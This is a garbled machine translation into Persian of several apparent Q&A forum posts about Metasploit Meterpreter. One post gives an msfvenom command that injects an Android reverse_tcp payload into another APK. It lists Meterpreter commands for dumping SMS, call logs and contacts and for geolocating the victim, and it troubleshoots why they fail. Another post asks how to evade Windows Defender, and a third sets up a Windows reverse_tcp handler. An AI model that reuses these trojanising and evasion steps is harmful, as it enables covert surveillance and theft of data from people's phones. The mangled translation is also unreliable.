من سعی می کنم از ویندوز 10 با استفاده از meterpreter استفاده کنم.
سوال من این است که چگونه برای جلوگیری از تشخیص توسط مدافع ویندوز و یا دیگر فایروال؟
metasploit meterpreter اندروید Infect apk کار نمی کند؟
من reprecedented_tcp را ایجاد کرده ام و با APK دیگر با این اسکریپت تزریق کردم
msfvenom -x path / to / original.apk -p android / meterpreter / reverse_tcp
LHOST = MyIP LPORT = MyPORT -o /path/to/result_infect.apk
پس من آن را بر روی دستگاهم اجرا میکنم، آن را اجرا میکنم
و مترتیمتر فعال هستم
اما مسئله
من میتوانم ' T استفاده از تمام عملکرد مترpreter. مانند dump_sms، dump_calllog یا webcam_steam.
شرح فرمان
------- -----------
activity_start یک فعالیت Android را از یک رشته اری شروع کنید
check_root بررسی کنید که آیا دستگاه ریشه دارد
dump_calllog دریافت تماس ورود
dump_contacts لیست مخاطبین را دریافت کنید
dump_sms دریافت پیام های اس ام اس
geolocate با استفاده از موقعیت جغرافیایی، با استفاده از موقعیت جغرافیایی فعلی به طول انجامید
hide_app_icon پنهان کردن نماد برنامه از پرتاب
interval_collect توانایی جمع آوری فاصله را مدیریت کنید
send_sms SMS از جلسه هدف ارسال می کند
set_audio_mode تنظیم حالت زنگ
sqlite_query پرس و جو از پایگاه داده SQLite از ذخیره سازی
wakelock فعال کردن / غیر فعال کردن Wakelock
wlan_geolocate با استفاده از اطلاعات WLAN، از طريق لاتين فعلي استفاده کنيد
meterpreter> check_root
[*] دستگاه ریشه ندارد
مترجم متن> dump_sms
[-] android_dump_sms: عملیات خراب شد: 1 مترpreter> dump_calllog
[-] android_dump_calllog: عملیات انجام نشد: 1
و غیره
چگونه می توانم این را حل کنم، سعی میکنم به دستگاه اندرویدی دیگر بپردازم و کار هم نکنم.
توجه: من مترتبکر (original.apk) را ایجاد کرده ام و به عنوان یک جذابیت کار میکنم، یا اجرای ضربه محکم و ناگهانی وب کم چرا این کار بر روی injected.apk اجرا نمی شود؟
با تشکر از شما.
شبکه – پوسته Meterpreter و پوسته سیستم تعریف شده است؟
تفاوت بین پوسته Meterpreter و پوسته سیستم چیست؟
فارکس، اگر من یک آسیب پذیری را در یک سیستم یافت که هر دو پوسته را مجاز می داند، پس چه باید بکنم shell shell یا Meterpreter shell ؟
چطوری می توانم با پوسته مترتیمتری انجام دهم اما نه با پوسته سیستم و برعکس؟
metasploit – آپلود فایل Meterpreter – تقسیم تقسیم بندی
من انجام برخی از آزمایش ها در دو VM، یک اجرا Kali و دیگری اجرا اوبونتو. من مشکل فرمان "آپلود" Meterpreter را دارم. به طور خاص، من قبلا یک session tcp معکوس با استفاده از linux / x86 / meterpreter_reverse_tcp loadload باز کرده و با استفاده از exploit / multi / handler exploit کار می کند.
هنگامی که جلسه در روشن است، من سعی کردم فایل file.sh را با استفاده از دستور "آپلود" آپلود کنم:
metpreter> upload kali / path / to / file.sh ubuntu / destination / path
آنچه در Vali Kali دریافت می کنم:
[*] uploading: kali / path / to / file.sh -> ubuntu / destination / path
[*] 10.0.2.15 - جلسه Meterpreter 3 بسته شد. دلیل: مرده
در VM ubuntu یک خطای جداسازی گسل دریافت می شود.
تمام دستورات مترpreter دیگر کار می کنند (حتی یک بار دانلود).
آیا کسی میتواند به من در درک مشکل کمک کند؟
metasploit – فرمان Meterpreter در پوسته کار نمی کند
من از استفاده از چند / handler و بعد را تنظیم PAYLOAD windows / meterpreter / reverse_tcp و سپس تنظیم LPORT 80 و LHOST 192.168.0.11 را پس از که من exploit-j -z را اجرا می کنم و بر روی دستگاه ویندوز من متصل به همان شبکه و به 192.168.0.11:80 متصل می شود و سپس جلسه خود را با جلسات -i 1 باز می کنم من در پوسته مترpreter من. هنگامی که من سعی می کنم برای اجرا ls، ps، cd، دانلود و غیره … من می توانم Command Unknown: command . من اشتباه میکنم؟ برخی از دستورات مانند help هنوز هم کار می کنند.
